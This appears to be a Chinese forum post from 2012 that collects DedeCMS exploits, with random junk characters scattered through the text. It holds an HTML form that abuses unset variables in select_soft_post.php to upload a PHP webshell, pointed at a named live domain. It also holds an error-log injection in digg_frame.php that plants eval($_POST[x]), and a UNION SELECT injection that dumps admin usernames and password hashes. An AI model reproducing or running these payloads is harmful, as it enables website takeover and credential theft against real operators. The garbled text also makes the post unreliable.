& m, {% }& {- F& u# E% I0 C. | ?) Z6 a/ t1 I* R1 Y
+ W5 U/ Q0 Y. m }
% ^, V9 B6 B. }5 m$ g) j" o织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
/ s) ]+ |* P. G9 |, g<html>$ } R7 u1 H- u
<head>2 S8 I- H+ r1 n7 Z0 d a
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>5 H4 G3 w8 P5 N) E& a7 n& o
</head>! r6 `; Y7 c% P# [$ m: _" E/ u, |, Q
<body style="FONT-SIZE: 9pt">
* h0 _8 B5 {; O$ S& M$ K---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />% w0 ?. y) j/ r7 p
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
& g9 A" l8 m, b0 }<input type='hidden' name='activepath' value='/data/cache/' />: @/ B, u6 o8 L! k
<input type='hidden' name='cfg_basedir' value='../../' />8 J; M. b7 {& f" O1 U0 W. g) Y
<input type='hidden' name='cfg_imgtype' value='php' />. |( i/ W' I0 x3 H
<input type='hidden' name='cfg_not_allowall' value='txt' />
0 b7 Z* z+ D3 Z8 o9 x7 F# d& O, `6 t# U<input type='hidden' name='cfg_softtype' value='php' />2 r% }* G( o$ Z5 y9 z
<input type='hidden' name='cfg_mediatype' value='php' />! G: R B1 y0 B& Q" q3 W# ^+ b u
<input type='hidden' name='f' value='form1.enclosure' />
3 _' g" C, R" K3 i t |, z# ~<input type='hidden' name='job' value='upload' />
% B- U0 `% r* ?3 g& a3 `<input type='hidden' name='newname' value='fly.php' />
, t$ A. }2 E! eSelect U Shell <input type='file' name='uploadfile' size='25' />! F7 W4 `5 v" z9 T$ m
<input type='submit' name='sb1' value='确定' />
/ v7 G ~4 _1 R: N: q</form>
- Y9 e8 W! Z9 r/ s! ?6 z5 [' l; B<br />It's just a exp for the bug of Dedecms V55...<br />
! h1 _& `5 z. e) e9 {Need register_globals = on...<br />
5 X6 c" y& R* V# V+ h1 w* eFun the game,get a webshell at /data/cache/fly.php...<br />& a1 ?7 A3 g+ N1 o7 {: {* J
</body>) ?. i: L& O9 I. ^$ I: s! [, c! ~2 E% D
</html>6 K- j3 J: h/ P# P5 T
: d% y3 M' t* @; C: S" @8 v7 X2 W- V, L
: B' ~1 z5 a3 _5 m. W
. v( X+ U2 W# }7 U: h, O
* N0 h" \+ h' k. [! L5 j
7 N8 U" c1 S. e# H8 I7 n+ M
- }2 k' o7 p* v8 b7 g& t. v" P
1 X9 q. f0 `5 c$ z, c
; J7 O1 ^+ k, F3 p5 H- Q1 q织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞! X, V8 \/ |: \
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。4 A/ e' G; v5 \, x
1. 访问网址:4 ~$ {2 [4 D4 ^( C0 h" O0 |/ J1 }6 z
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
% M: k. a& D* _& [$ B; w可看见错误信息* K4 i X, u: N1 C$ m7 D3 W
& V: |: E8 P3 d$ {
3 ]6 Z( t" y8 c- w; d2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。& @2 J+ F5 l, D# e: {
int(3) Error: Illegal double '1024e1024' value found during parsing
9 M, X6 D1 L# z( \4 W/ w9 ?Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>9 u% M4 b+ Y7 _7 f! K) b
) q+ p u+ U7 [8 c
9 `5 [6 F4 l! @' k4 y& k
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
4 E1 [ F& r6 W3 a4 y; y R+ d
9 Q% A( s2 ?. Q8 Q* g# M+ R
. B% T ?5 L- [, n<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>* s+ T( F, X9 o# _7 U$ _7 P
! N! i. v, ^: L; l/ k8 K4 ?7 u: M" b) \
按确定后的看到第2步骤的信息表示文件木马上传成功.
8 \# s" j; f9 w& l. Z: _& V: @# J) C) W. i5 n2 c' W, d$ [# ^
" p1 T7 M6 ^& `9 M. ?% s( |4 S A6 b, Z" ^" `3 K
: [0 [7 c( m* f' f
0 G6 A) ?9 F/ M: l+ d! ]' S5 _9 B0 j6 H S
0 B* O v5 U" {% L7 `) q% \2 A
) ^: n! S- y) L% B9 }" J4 ]
9 T# _2 P/ B" u' T0 m# T9 H( C. w0 w4 N1 \8 i/ G
6 }9 n: r9 V7 ]3 z
& _+ s9 i# k0 c织梦(DedeCms)plus/infosearch.php 文件注入漏洞' j) r l+ l( P2 ~2 Z' _
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对